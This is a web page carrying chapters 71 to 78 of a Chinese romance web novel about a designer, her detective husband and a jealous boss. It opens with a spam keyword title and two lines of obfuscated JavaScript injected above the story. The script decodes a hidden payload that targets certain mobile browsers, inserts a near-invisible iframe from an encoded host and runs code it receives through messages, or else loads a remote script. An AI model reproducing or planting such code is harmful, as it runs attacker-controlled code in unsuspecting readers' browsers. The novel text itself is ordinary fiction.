病娇的粗大h_乱 h伦

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
第七十一章 夫妻齐心

如果前方的两人此刻能听清楚她的话,会发现她此刻用的是“我的公寓”而不是“我们的公寓”。

只可惜,前方的两人却没有因为她的话而停留,显然他们本就没有注意到。

而她语调里,是苏梦瑶从未听到过的卑微。

记忆中,苏梦菲因为气质和才情都比较出色的关系,一直都被周围的人赞扬。所以,她在苏梦瑶的面前,也一直都是高姿态自居。像今天这样的情况,还真是实在少见。

这又让苏梦瑶有些怀疑,她对周先生……

正想着某些东西,周先生搁在她腰身上的手突然紧了紧。

抬眸,苏梦瑶对上周先生的黑瞳,看清楚了某些东西之后,便转身看向身后的苏梦菲:

“不了,姐姐。左佑良说了,这个星期我要是不交出来的话,就将我的奖金给扣了!”

这是实话,左佑良确实这么说了。

当然,苏梦瑶清楚,以他们两人的交情,这情况应该是不会发生的。可眼下,她还真的和周先生一样,不想继续呆在这个地方了,因为这气氛实在太过诡异了。她只能将左佑良给拉出来,让他为她这一次背负上这个黑锅。

可就算苏梦瑶已经这么说了,姐姐似乎还是不死心。站在原地,她用十分纠结的神情看着他们两人,当然她的视线更多的是落在她身侧的周先生的身上:“可是,你们难得来一次,左佑良也太不……”

苏梦菲不死心,美丽的眸子看着周子墨,希望男人能因为她的神情而产生动容。

却不想,当她如此看着周子墨的时候,原本吃完饭已经回了卧室的董辰却突然出现了。这一瞬,男子的大掌突然悄然爬上了苏梦菲的腰身,一把就将她搂进了自己的怀中。

“董辰,你这是干什么……”

面对董辰突然起来的举动,苏梦菲显得有些恼意。甚至连盯着男人看的双眸也都带上了怒火。

她的身子,有些不安分的在董辰的怀中挣扎着。

似乎每一次,董辰的刻意接近,苏梦菲都急着和这个男人撇清。

只不过,对于这个女人的做法,苏梦瑶很是不解。他们不是已经是夫妻了吗?为什么他们的相处模式,还是这么的奇怪。

而在苏梦瑶有些好奇的看着他们两人的时候,周先生的大爪子也开始在她的腰身上不安分了起来。一个轻勾之后,苏梦瑶的整个身子便被他抱了个满怀。

“我们走!”

这话,显然是命令,而不是征求意见。

当他说完这么一句话之后,便已经不由分说的将苏梦瑶往门外拽。

很快,便来到了公寓的大门前。

而他们的身后,还不时传来苏梦菲和董辰的争吵。

“放开我,我还有话想要跟他们说。”

“我不放!”

“董辰,你这到底是怎么了?”

“我还问你怎么了。他们还很忙,你这么留着人家,岂不是耽误人家工作吗?”

“可是……”

董辰的每一句话,都说的有理。

可为什么从他的每一句话中,苏梦瑶却听到了一个男人醋意。

通常的情况下,男人的醋意都是只有在另一个对女人示好的男人出现的时候,才会有的。就像是上一次,周先生到公司楼下接自己的时候,看到左佑良和刘栩楠陪伴自己左右的时候一样。

可眼下,他们一起吃饭的人当中,就只有一个周子墨。

难道董辰对周子墨产生了敌意?

这不正常,不是么?

周子墨是苏梦瑶的丈夫,苏梦菲的妹夫。他们之间怎么可能有其他呢?

苏梦瑶是这么想的。所以她很想在听听,是不是这当中有什么误会。

可周子墨就像是故意和她作对似的,将她带出公寓之后,便立马将那扇门也给关上了。

瞬间,房间内的一切交谈都因此而平息了……

第七十二章 周太太,其实你可以丑点

看着门被关上,听不到一点声音。苏梦瑶转身,怒瞪着周子墨。

苏梦瑶因为怒气而双颊染上了绯红,也因为怒焰而瞪得眼睛老大,像是要借此来恐吓周先生。却不知道,当她气鼓鼓的神情落进周子墨的眼里之时,却越发的觉得这个小女人的可爱。

想来,当初娶了她真的是他周子墨有生以来最为明智的选择。

“老婆,你怎么了?!怎么气冲冲的,是谁惹你生气了?”见苏梦瑶瞪着自己,一副要和自己决一死战的眼神,周先生便知道自己把周太太给惹毛了,正等着要兴师问罪。

看着这样的周太太,周先生还是决定先发制人。

要知道,周先生不仅是一个好警察,还是一个以心里战书和罪犯作斗争最为出名的警官。看着这会儿怒火老大的周太太,周先生清楚这一次自己在劫难逃。

当然,若是自己掌握了形势的话,还能躲过这一劫。

想着,周先生蹭到了周太太的身边,像是搀扶着老佛爷似的,将苏梦瑶半哄着,半推着,带出了这个小区,塞进了自己的车里。

“周先生,你存心想要气死我,是不是?”进了车,周太太的气息还是有些不稳。和周子墨坐在车内之后,她很不情愿的掐着自己的包包,将它当成了周先生的脸,撕着扯着。

看着那有些变形扭曲的包包,周先生极为肯定,若是这个换成自己的脸,被周太太这么蹂躏的话,那恐怕回到家之后连他亲生的爹妈都会认不出自己了。

有些感激的看着周太太手中那有些不成样的包包,周先生这才开了口:“哪敢。要是把周太太给气死了,我以后怎么办?”

“你还敢说?你不是就等着气死我,然后好娶个年轻漂亮的?”

见周子墨还油嘴滑舌的,苏梦瑶更有些口无遮拦。

却没有注意到,他们的话题已经偏离了轨道。

“我老婆已经够年轻漂亮了。还经常能招惹其他的小苍蝇到处飞,让我不得安生。要是再弄个更漂亮的,我岂不是自己找罪受?”

周先生说这话的时候,黑色的瞳仁突然变得有些黯淡。

连刚刚油嘴滑舌的时候扬起的嘴角,也变得有些僵硬。

苏梦瑶当即发现,周先生大概又想到了左佑良那边去了。

想想,她好不容易才和周先生恢复了平静的生活,为什么要纠结在这一些事情上?

可身侧的周先生,分明还不知道自己的想法。这一刻,他还有些懊恼的看着身侧的周太太:“老婆,你说你干嘛要这么年轻?要是再老一点,再丑一点的话,那我就不用担心那些人将你抢走了!”

“我要真是那么老,还那么丑的话,你指不定就跟别的女人跑了!”

周太太睨了他一眼之后,冷哼着。

不过,人皆有爱美之心。

被周先生这么一夸,周太太也顿时心情愉悦了许多。

对着后视镜捋了下自己鬓角有些凌乱的发丝,顺便检查完自己的妆有没有花掉之后,周太太便对周先生说道:“还不快开车!”

“遵命,我的周太太……”

连懵带拐,总算将周太太带离了这个小区之后,周先生憋在口的那股慌乱,总算是消失了。

不过从后视镜里看着这个小区越变越小的影子,周先生觉得是该找个时机,和周太太坦诚曾经发生过的那些事情。因为他真爱着周太太,所以希望她也能了解自己的曾经,最好的是更能将心思落在自己的身上。

只不过,现在还不是时候。

因为在周先生看来,周太太现在的心里似乎还没有他周子墨的身影……

第七十三章 兜风

有些事情,最好还是等周太太真的动了心,或是有了他周子墨的骨之后才说出来比较好。

其实,对于周子墨来说,他是一个警察,对于人的心里动机和其他的一切,都可以看的很透彻。甚至还能通过这些人的想法,分析得出他们之后会作出什么事情。

但一切的才能,似乎在面对苏梦瑶的时候,就完全施展不出来了。他本无法琢磨的清,这个女人在想些什么。更无法预料的出,在知道当初他为什么会娶她的时候,她会作出什么行为……

所以在这样的情况下,周子墨不敢贸然行事。因为,他害怕周太太会一怒之下离开自己,更因为他的心里已经装着周太太了……

想到这些的时候,周先生抽空从后视镜里看了一下周太太。

见她正看着窗外不断变化的景物发愣,周先生有些懊恼。

他周子墨长的这么好看的帅哥就摆在她周太太的面前,可周太太却视而不见。反而紧盯着窗外那些没有任何美感的花花草草发愣,这到底是为什么?

难道,这又是自己的造型不够好,所以无法让周太太的视线,更多的落在自己的身上?

看着周太太那俏丽的侧颜,周先生猛然间想起了上一次周子放对自己说的话。

想着,周子墨的视线落在刚刚放好的墨镜,连忙对周太太道:“老婆,把我的太阳眼镜递过来!”

“你还要戴?”

苏梦瑶很无良的看了一眼周子墨,有些犹豫。

虽然说,周先生带上这样一副太阳眼睛,也很是帅气。再加上他身上的穿着,简直就跟T台上的型男有的一拼。

不过这样的光线,似乎不需要吧?

“戴,怎么不戴。这阳光,很刺眼!”周先生抬头望天,感慨着。语毕的时候,他还不忘空出一只手,半当着自己的一只眼睛。

可苏梦瑶抬头,现在他们是坐在车子内,顶层还包的严严实实的。至于前方,因为是正午的关系,阳光也本照不到周先生的眼睛……

看着这一周围的光线,苏梦瑶怎么有种感觉,周先生想要戴太阳眼镜,是故意要骚包的?

“快点,帮我带上!”正想着,周先生又催着,甚至还很无赖的将自己的脸凑到周太太的面前。

苏梦瑶只能无奈的将那副大太阳眼镜挂到了周先生的脸上。

之后,因为太阳眼镜是周太太亲手帮自己戴上去的,周先生心情变得非常好。

一整个中午的时间,周先生很阔绰的带着周太太,开着自己心爱的奔驰,穿梭在这个城市的大街小巷。

美其名曰:带着老婆兜风。

因为周先生今天怪异的装扮,还有嘴角那频频露出的灿烂笑容,周太太真的很难做到忽视他的存在。但每一次看到周先生脸上的那副太阳眼镜,周太太的嘴角就有些抽搐。明明就没有需要戴太阳眼镜,可周先生却强调太阳有多么的刺眼,分明就是为自己的骚包行为寻找借口。

但周太太的想法,周先生却并不知晓。他只是察觉到了,当自己戴上这幅太阳眼镜之后,周太太的视线就时不时落在自己的身上,想来应该是被自己帅气的新造型给迷倒了。这也是,周先生为什么开着车,一边哼着小曲,还不时对着后视镜展露迷人笑容的原因。

看来,周子放说的不错。女人,也喜欢新鲜的事物。看来,他周子墨还真的要再多找他要一点新奇的事物,好将周太太的视线更大部分的给霸占了……

虽然说这个中午的阳光有点毒,周先生的装扮有点怪异,而看着周先生的周太太需要花费很大的力气,憋住笑声,不让周先生发现她唾弃他的行为很幸苦。

但总得来说这一次的兜风两人相处的非常愉快……

第七十四章 意外横生

中午那顿不是很愉快的聚餐之后,周子墨带着周太太到处兜了几圈。直到差不多到了上班的钟点声的时候,才将苏梦瑶送到了公司的楼下。

一将车子停下来,周太太便准备推开车门,身后却传来了熟悉的清越男音:“老婆,等下!”

“怎么了?”

转过身的时候,苏梦瑶发现周先生正从自己的车载小冰箱里拿出了一瓶咖啡。“这个给你!还有这个……”

说着,周先生又从自己另一侧的车抽屉里拿出了一个面包,将它们一并塞到了周太太的手上。明明从刚刚上车之后,周先生一直都和她苏梦瑶在一起,她都没没有看到周先生中途离开去买什么东西的。可现在,他竟然将一切都准备好了。

这样的贴心,说不感动那是假的。

看着面前那张帅气的脸,还有他唇角上勾起的弧度,周太太感觉自己的内心某一处好像是被什么东西撞击了一下。

在回过神来的时候,周先生的手已经不客气的对着她的小脸掐了一把。虽然周先生的面部表情很凶悍,但落在她脸上的手却是十足的温柔。

“周太太,是不是越来越觉得,你家周先生帅到让你昏头转向了?”

他看着她,唇角勾起的弧度越发的邪肆。

“臭美!我不理你了,上班去了!”说着,苏梦瑶便推开了车门,直接走进了公司的大厦。

而盯着女人离去的周先生,却是一脸的柔情。

因为周太太的缘故,周先生上班的一整个下午都是一脸温柔,就连对待今天抓到的某某罪犯之时,周先生也是和颜悦色的。当然,一向都以此局最为险的人物著称的周子墨,这个城区的人自然都是有所耳闻的。当他面带笑容,如此审问犯人的时候,害他以为这个腹黑的警官不知道又要出什么招数逼他招供吓得直哆嗦。最后,他还是老老实实的将自己所犯下的那些交代了。

而如此一脸温柔的周先生,更是搞得整个他所带领的队伍有些慌张。因为在他们的认知里,周先生从来都不会如此平易近人的笑。可今天突然变成了这样,正所谓事出有弊必有妖。

难道,周先生正耍什么小心机,正候着他们几个?

于是,一整个对的人都在这样的惴惴不安中,度过了一个下午。

而周太太则在和周先生分开之后,迅速的开始开展这个设计图稿的最后一个部分。

今天把这个计划给完成之后,她这个星期六日就可以舒舒服服的度过了。

一想到这,苏梦瑶就来了神。

“瑶瑶,做好了没有?”

没有敲门,推门而入的便是偶尔会犯弱智的左佑良。

“就快了。”说着,苏梦瑶抬头看了一眼左佑良之后,便又继续埋头整理自己手提电脑上的东西:“左总有什么事情么?”

“就是过来看看你做完了没有。顺便看一看,你这里有没有什么喝的东西?”说着,左佑良的视线落在苏梦瑶桌上的罐装咖啡上。

“你别看,这个没有你的份!”

苏梦瑶抬头的时候,自然注意到左佑良的视线。

这可是周先生在她上班之前给她的,就是属于她的,怎么可以和其他人分享呢?

“就咱俩的交情,我就敢在你苏梦瑶的生命中猖獗一辈子。更不用说,是这么一罐小小的咖啡了。”见苏梦瑶不肯将咖啡给自己,左佑良的心里觉得不是滋味。

两年以前,只要苏梦瑶有什么东西,她都会和自己分享的。

无论是吃的东西还是心事,她都会让自己第一时间知道。

但现在……

现在他们之间,总是隔着一个周子墨。

苏梦瑶对周子墨,似乎也越来越依赖了……

趁着苏梦瑶还没有反映过来的时候,左佑良抓过桌上的咖啡,迅速打开。

“左佑良,你怎么这样!快还给我!”

这是周先生给的,她不喜欢和任何人分享,就算是左佑良也不行!

说着,苏梦瑶便快步来到左佑良的身边,准备趁着左佑良没有喝下去之前,强夺回来。

可这一回,左佑良似乎下定了决心,一定要抢了责备咖啡似的。在苏梦瑶过来抢的时候,他开始往自己的唇边凑。

“左佑良,你……”

看着周先生给自己的咖啡就要送到左佑良的口中了,苏梦瑶一下子顾不得其他了,半个身子前倾,准备从左佑良的手上夺过来。

可也就是在那么一瞬间,不知道是谁的脚一滑,两人齐刷刷的朝着苏梦瑶所在的方向倾倒。但在那一瞬间,左佑良突然伸出了手,将女人的腰身环紧,一个转身……

苏梦瑶一直以为,迎接自己的会是一顿吃痛,便绝望的闭上双眼。可本该迎来的是一阵尖锐的痛楚,却发现是出奇的柔软。

睁开双眸一看,左佑良不知何时已经躺在自己的身下。而他们此刻的姿势,有些不雅……

第七十五章 他的爱

苏梦瑶睁开眼睛一看,发现左佑良不知何时已经躺倒了自己的身下。

看着左佑良此刻皱成一团的俊颜,苏梦瑶不难想象刚刚若是换成自己躺在下面的话,那搁着该有多痛。

“左总,你没事吧?”苏梦瑶看着左佑良那吃痛的表情,赶紧打算坐起来。可当她的腰身才一支起来,左佑良落在她腰身上的手便紧了几分。

“别动,就这样呆一会儿,挺好。”他侧过身,正好将自己的唇贴在了她的耳际。

这样的姿势,有些暧昧。

这样的动作,过分柔情。

她是有家室的女人,他对她这样的话,可能会对她造成不良的影响。

但他,就是忍不住……

他的爱情,始终晚了一步。

可要他放手,他真的做不到。

就算只能像现在一样,远远的跟在她的身后看着她,偶尔逗逗她让她笑一笑,左佑良也觉得值得。

他一直认为,自己能将对她的情掩饰的很好。

但今天,在他环上她的腰身,感受着她那腰上没有一丝赘所带来的极致触感,他的手突然贪恋的不想离去。更贪婪的想要,将她就此纳进自己的怀中。

脑子中突然闪现某些片段,男人落在她腰身上的手突然又紧了紧。那本就凑到了女人耳际的唇,也开始慢慢的移动,朝着女人那张有着玫瑰一样诱人色泽的唇瓣落去……

“左佑良,你干什么。快放开我……”那不熟悉的大掌传来的温热,让苏梦瑶的身子一僵。而看着那不断接近自己的唇瓣,苏梦瑶脑子里突然闪现的,是周先生那张带着痞子一般笑容的脸。

一瞬间,女人突然疯狂的挣扎着。她的嗓门,也加大了几分。

这样的动作,自然让左佑良突然清醒了几分。

特别是在看到苏梦瑶那双眸子里的雾气之时,男人脑子里那些不该有的念想突然全部退却。

“瑶瑶,这是怎么了?”慌乱间,左佑良忙着坐了起来,将苏梦瑶搂到自己的面前,仔细察看着是不是刚刚摔伤了。“是不是刚刚磕着碰着了?”

“没有。”

“没有那是怎么了?快给我说说,我都快急死了。”

“你怎么可以……”

“可以什么?”

“你刚刚不是要那个……”瞪着左佑良,苏梦瑶比划着刚刚他们躺在地上,左佑良的唇还凑近自己的。

那一瞬,男人的灰眸里,突然黯淡了几分。但那,只是一瞬。片刻之后,男人的灰瞳便恢复了往日的清亮,甚至嘴角也挂起一如往日的猥琐笑容。这样的左佑良,一点也都看不出,刚刚还处于失落和黯淡中。

“瑶瑶,你想什么呢?就你这水桶腰,最多也只适合给本少爷当个绿叶陪衬一下,你以为本少爷会看上你?”

“可是……”看着恢复了往日神情的左佑良,苏梦瑶有些迟疑。

“还可是什么?你以为本少爷长的人见人爱,花开花败的小脸蛋,会看上你这样的档次?别往自己脸上贴金了。”说到这的时候,左佑良还无意的看了自己的口处的那一块。

上面,还留着她刚刚跌倒的时候,趴在他口上时沾染上的气息。

那是,他最爱恋的味道。

但左佑良也意识到,刚刚自己的此番行为会被苏梦瑶识破,便立马转换城凶神恶煞的眼神对苏梦瑶说:“你看,我的衣服都被你弄成这样了!这可是我下个星期要见新女朋友准备的衣服!”

苏梦瑶原本也没有觉得觉得什么,可凑近一看,便发现了左佑良的衬衣上却是粘上了咖啡的污渍。

“最多我买一件赔给你就是了。”其实,苏梦瑶也知道,左佑良并不缺衣服。可为了化解眼下的尴尬,她只能咬牙承诺着。“不过,我可没有钱买这档次的!”

“那这是你说的。星期一上班的时候,要是没有带上新衬衣赔给我的话,奖金扣半!”

说完这一句,左佑良便起身离开了。

走出她办公室门的时候,男人的唇角勾勒着无奈的弧度。

也许对苏梦瑶来说,他左佑良和她最适合的距离,就是现在这样。偶尔小打小闹,也偶尔耍耍小脾气。

虽然这对他左佑良来说,有些残忍。但只要是苏梦瑶要的,他从来都不会拒绝。

这是,他对她的爱……

------题外话------

我把家里的电脑给拆了。汗……

第七十六章 老婆,这是买给我的?

经过左佑良的搅局之后,苏梦瑶折腾了一整个下午,总算在周五下班之前,将这个星期要交的设计稿件完成了。简单的收拾一下之后,她开车来到菜市场。

现在每个周末,周先生和自己一样,都会放假。难得两人都会在家,苏梦瑶今天打算多做一点菜,好犒劳一下自己今天中午没有吃饱的那一顿。

买完菜,开始往家里开去的时候,苏梦瑶被一条大横幅所吸引。上面写着:“衬衣大甩卖,每件30元。”

想着刚刚左佑良在办公室对自己腰身的唾弃,一抹邪恶的弧度悄然在苏梦瑶的嘴角绽放……

买完了全部东西,苏梦瑶赶回到家里的时候,门口周先生的皮鞋东一只西一只,和他周子墨一样无赖而霸气的宣告他的存在。

清越的男音,从客厅里传来:“周太太,你怎么才回家,我都快要饿死了!”

“我这不是去给你买吃的东西了吗?”说着,苏梦瑶走进了客厅,拿着手上的那一袋东西朝着周先生晃了晃。

“有没有丝?我今天办了个大案子,现在肚子叫的欢。”原本躺在沙发上的周先生,一见周太太进来,也赶紧坐了起来。

以前,只要他一进家门,他才不会管那么多。除了吃饭之外,他都会很没有形象的躺在沙发上看电视,不然就是上网看视频。但自从结婚之后,他开始顾及在周太太面前的形象,就像现在一样。他最想要的,是周太太看到自己好的一面。当然,某些习惯要他在一时之间改过来还真的有点困难。

就像,进家门鞋子总是忘记放进鞋柜。

不过,在周太太的面前,他会努力的收敛一点的。就像,现在一样。

“有。今天买多了一点,我这就去做饭!”

看着沙发上坐在沙发上的周先生,苏梦瑶感觉心里暖暖的。以前她觉得结婚没有什么,可现在看着每次回到家总是先她一步进门的周先生,她突然发觉,其实结婚也不错。起码每天回到家的时候,总有那么一个人等待着你……

说着,周太太便走进了厨房。

半个小时之后,厨房里传来了饭菜香。

周先生也被吸引了过来,来到周太太的身后,有些无赖似的用自己的手紧紧的圈着女人的腰身,将自己的头蹭到女人的耳际。

“周先生,你这是干什么?没看到,我现在正给你做吃的吗?”周太太说着,还比划着自己手上的锅铲。

“看到了。不过,今天是什么日子?”周子墨依旧没有理会周太太的威胁,依旧自顾自的哼着小曲,享受着怀中女人带给自己的那份感动。

但他的话,却让苏梦瑶有些不明所以的看向他:“什么日子?”

“对啊,难道是我们结婚第一百天?好像不是,已经过了……那是老婆你的生日?好像也不是,我记得我看过你的身份证明,是十二月份的。”

看着周太太搅拌着锅子中的丝,周先生嘴里念念有词。落在苏梦瑶身上的大掌,也开始有些不安分。

“为什么一定会有节日呢?”对于周先生的话,苏梦瑶有些不理解。吃喝拉撒乃人之常情,为什么一定要是节日?

“不是节日?那为什么突然会给我做这么多好吃的,还有给我买礼物?”

周子墨继续在女人的身侧歪腻着。

提及“礼物”二字的时候,周子墨那一双黑色的瞳仁里,竟然有着夺目的光彩在流窜着。

“礼物?我什么时候给你买礼物?”

“不是放在客厅里了吗?我都看见了,老婆你就别不好意思了!”

说着,周先生还歪腻的在周太太的脸上留下一个香吻。

“那件衬衣?”听着周先生的话,还有他脸颊上不自觉泛起的红晕,苏梦瑶的柳眉有些微皱。

敢情,周先生将她刚刚买回来,放在客厅里的那件大减价的衬衣,当成给他的?

“是啊,虽然那桃红色不是我喜欢的,但还真的要谢谢老婆你。”周先生嘴角扬起的弧度,证明着他此刻心情非常愉悦的事实。

只是,当接下来周太太的声音响起的时候,原本挂在男人嘴角上的耀眼弧度,却突然间僵硬了好几分。

“老公,那衬衣其实不是买给你的……”

第七十七章 不是给我,那是给谁?

“老公,那衬衣其实不是买给你的……”

被周先生紧抱在怀中的周太太脸色突然也变得不是那么好,低柔的声音里也有些一些犹豫。

她很清楚,当一个人正处于迎接礼物的兴奋中,而她却如此说出来的话,对周先生而言简直就是当头一。

可不说出来,她有觉得对不起周先生……

“不是买给我的?”听着耳际传来的女音,周先生脸上原本因为感动而扬起的弧度,突然间变得有些僵硬。连那一双漆黑如墨的黑眸子里的光亮,也在这一瞬间黯淡了许多。原本环着周太太的臂膀,也变得有些松动。

最为明显的变化,是周先生的声音。

在苏梦瑶的印象中,周子墨的声音都是那么的清越。除了早晨和每天晚上缠着她去睡觉之外,这个男人的声音一直都是那么的清亮动人。

但此刻……

周先生的声音低沉的,有些骇人。

就算他的口还贴在她的背脊上,就算他的身上还有她所熟悉的温度,但周太太却感觉到,自己的背后是一阵冷。而在这样的冷中,她也有些不争气的打了一个冷颤。

“嗯。”虽然此刻的她很不想回答周先生的这个问题,但这个男人的身上,与身俱来的威严,让你不用看到他的脸色或是双眸,便不自觉的屈服于他。

也很明显的,当周太太强忍着心中的不安,回应男人的这个问题的时候,她周围的温度好像又骤然下降了好几度。

而远周先生松开了的手臂,又瞬间紧了几分。将周太太紧紧的捆在他的手臂,还有他的膛之间,让她动弹不得。

“周子墨……”

意识到自己刚刚的话可能伤害到了周子墨,周太太赶忙开口唤这个男人的名字。

以往,只要她如此低声下气的叫周子墨的名字的话,再大的不快这个男人都会忘掉,然后无奈的将她抱在怀中。

但今天,情况好像不大一样。

因为即便她已经如此低声下气了,周先生落在她腰身上的手却依旧没有松动半毫。

从他身上蔓延出来的冷,也没有一丝一毫的减弱。

“不是买给我的,那是买给谁?”

他的语调,有点冷。

冷的,不像是他……

而在这一个过程中,周子墨一直都抱着她的腰身,不让她有丝毫机会可以逃开。

他的呼吸,很安静。

之后,周先生也没有再开口说些什么,一直安静的等待着她给的答案。

而在这一过程中,周太太也不知道该如何开口。

她一直安静的缩在周先生的怀中,企图做一直鸵鸟,将外面的一切干扰全部都阻挡在自己的脑门外。

这一瞬间,这个敞大的公寓里,安静的有些骇人。

除了炉子上煮的那些丝偶尔发出“滋滋滋”的声响之外……

这样的氛围中,空气好像是被冻结了。那无形的空气,仿佛也被冻结成墙,阻隔在他们之间。

他们之间,膛贴着背部,心脏的距离可以说是最近的。

可因为那道无形的墙的缘故,周先生本就无法感应到来自这个女人身上的一丝一毫。

他以为,安静的等待着,周太太便会给他最想要的答案。

可越是这么等下去,周先生觉得越是无望。

因为他真的不知道,周太太会给他一个什么样的答案。

是因为情,还是因为其他的……

那衬衣,分明就是一个年轻男子的。

周太太是对别的男人动了心是么?

所以,才会买了男人的衬衣送给那个男人?

可这样的答案,真的不是他想要的。

连周子墨自己都无法确定,听到这么一个答案的时候,他会不会接受的了。

他害怕,自己会在这个女人面前失控,这是他最不希望的……

第七十八章 周太太毛躁了

当周子墨问出这么一番话之后,他们之间又是一阵沉寂。

周围的空气,仿佛也犹豫着该不该闯入他们之间。

周先生一直等待着苏梦瑶的答案,视线也一直落在她的身上。

而在这一整个过程中,周太太始终都充当鸵鸟,呆呆的站着。因为连她自己都不清楚,该怎么回答男人的这个问题。

“买给旧情人的,还是那个姓左的?”

又是一阵良久的沉寂之后,周先生最终还是直接问出了自己心中所想的那些。

他怕再不问出口,他周子墨会因为自己脑子里泛起的那些想法而崩溃。

问出这番话的时候,他的声音有些哑。连周子墨自己,也都没有听到过这样的哑。

那哑哑的声线,在这样安静的氛围和炉子上的炒丝发出的“滋滋滋”声音的结合下,就像是化不开的结,缠绕在他的心头,也缠住了她的心尖……

而问着这番话的时候,男人握着女人腰身的大掌再度收紧了几分。那样的力道,就像是要将周太太完全的纳进他的世界里。

他,真的不想放开这个女人……

向来潇洒的他,这一次却真的无法做到。

面对周太太,很多时候他都是这么无力的。

“周子墨,那个衬衣是我买来……”赔给左佑良的。

因为他周子墨送给她的那杯咖啡的缘故,她弄脏了左佑良下个星期约会要穿的衬衣,而那个邪恶的家伙竟然以此作为要挟,若她不赔给他一件衬衣的话,那她这个月的奖金就要扣半了。

所以她没办法,只能在看到街边衬衣大减价的时候,买了这样一件妖娆的桃红色衬衣,准备赔给左佑良。

本来打算进家门之后,第一时间就将这件衬衣藏起来的,却因为周先生的一句话,她急匆匆的进了厨房。

只是,没有想到就是因为一时的疏忽,导致了现在这样的场面……

周太太很想要向周先生解释清楚这些东西,可当她的话还没有完全说出来的时候,男人便先行开口,打断了她想要说出来的话。

“不用说了。快一点把饭做好,我肚子饿了。”

说这话的时候,周先生的声音除了有一些冷硬之后,其他的都已经恢复了寻常的模样。

之后,他环在她腰身上的手,也突然松开了。然后,他便转身离去。

一整个过程中,没有一丝犹豫,也看不出其他的思绪。

甚至,连他的背影都看起来是那么的潇洒。

